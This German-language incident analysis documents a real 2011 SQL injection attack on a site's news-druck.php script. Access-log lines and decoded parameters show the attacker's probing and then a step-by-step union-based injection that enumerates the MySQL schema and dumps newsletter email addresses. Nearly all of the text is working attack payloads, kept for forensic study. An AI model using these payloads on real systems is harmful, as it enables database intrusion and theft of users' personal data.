Bei einer Webseite gab es in dem Skript news-druck.php eine SQL-Injection-Lücke. Diese wurde von einem Angreifer entdeckt und vier bzw. fünf Tage später ausgenutzt. Dabei wurde allerdings solch eine Last auf dem System erzeugt, dass er Vorfall auffiel.

Mithilfe der Lücke wurden unter anderem E-Mailadressen aus der Datenbank ausgelesen. Der Inhalt des Skript war nicht öffentlich bekannt (closed source).

Die Entdeckung der Lücke

58.40.69.134 - - [08/Feb/2011:21:16:05 +0100] "GET /news-druck.php?newsid=6428 HTTP/1.1" 200 3544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:06 +0100] "GET /news-druck.php?newsid=6428%27%60%28%5B%7B%5E%7E HTTP/1.1" 200 1872 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:06 +0100] "GET /news-druck.php?newsid=6428%20aND%208%3D8 HTTP/1.1" 200 3544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:07 +0100] "GET /news-druck.php?newsid=6428%20aND%208%3D3 HTTP/1.1" 200 1702 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:29 +0100] "GET /news-druck.php?newsid=6428%20%20AnD%20len%28uSeR%29%3E0%20 HTTP/1.1" 200 1872 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:29 +0100] "GET /news-druck.php?newsid=6428%20%20AnD%20aSc%28chr%2899%29%29%3D99%20 HTTP/1.1" 200 1872 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:30 +0100] "GET /news-druck.php?newsid=6428%20%20AnD%20length%28uSeR%28%29%29%3E0%20 HTTP/1.1" 200 3544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:31 +0100] "GET /news-druck.php?newsid=6428%20%20AnD%20version%28%29%3E%3D5%20%20 HTTP/1.1" 200 3544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Dekodierte Parameter:

{"newsid"=>["6428"]}
{"newsid"=>["6428'`([{^~"]}
{"newsid"=>["6428 aND 8=8"]}
{"newsid"=>["6428 aND 8=3"]}
{"newsid"=>["6428  AnD len(uSeR)>0 "]}
{"newsid"=>["6428  AnD aSc(chr(99))=99 "]}
{"newsid"=>["6428  AnD length(uSeR())>0 "]}
{"newsid"=>["6428  AnD version()>=5  "]}

Ausnutzen der Lücke

Dekodierter Anfang des ersten Angriffs:

mysql> select 0x2128265E29284023;
+--------------------+
| 0x2128265E29284023 |
+--------------------+
| !(&^)(@#           |
+--------------------+
  1. Schritt: Bestimmen der Anzahl der Spalten in der Abfrage

    newsid => 6428 and 3=8 union select 0x2128265E29284023 --
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    
  2. Schritt: Bestimmen, welche Spalten auf der Webseite ausgegeben werden

    newsid => 6428 and 3=8 union select 0x2128265E29284023,2,3,4,5,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,0x2128265E29284023,3,4,5,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,0x2128265E29284023,4,5,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,0x2128265E29284023,5,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,0x2128265E29284023,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,0x2128265E29284023,7,8,9,10,11,12,13,14 -- 
    
  3. Schritt: Auslesen von Systeminformationen

    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,version(),0x7E257E,database(),0x7E257E,user(),0x7E257E,session_user(),0x7E257E,current_user(),0x7E257E,system_user(),0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,@@basedir,0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,@@datadir,0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,@@tmpdir,0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,@@version_compile_os,0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,'24287ed92d9c91f5',7,8,9,10,11,12,13,14 -- 
    newsid => 6428  /*!49999 and 1=2*/
    
  4. Schritt: Auslesen der Datenbankstruktur

    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `schema_name`,`default_character_set_name` from `information_schema`.`schemata`) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`schema_name`,0x4E554C4C),char(9),ifnull(`default_character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`schemata` limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`schema_name`,0x4E554C4C),char(9),ifnull(`default_character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`schemata` limit 1,1 -- 
    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `table_name`,`table_rows` from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 1,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 2,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 3,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 4,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 5,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 6,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 7,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 8,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 9,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 10,1 -- 
    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `column_name`,`data_type`,`character_set_name` from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 1,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 2,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 3,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 4,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 5,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 6,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 7,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 8,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 9,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 10,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 11,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 12,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 13,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 14,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 15,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 16,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 17,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 18,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 19,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 20,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 21,1 -- 
    
    
    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `column_name`,`data_type`,`character_set_name` from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 1,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 2,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 3,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 4,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 5,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 6,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 7,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 8,1 -- 
    
  5. Schritt: Auslesen von Tabelleninhalten

    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `id`,`email` from `usr_web222_1`.`newsletter`) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 1,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 2,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 3,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 4,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 5,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 6,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 7,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 8,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 9,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 10,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 11,1 -- 
    

Nach dem gleichen Muster wurden dann noch weitere Tabellen ausgelesen: Chronologie-sql-injection-access.log.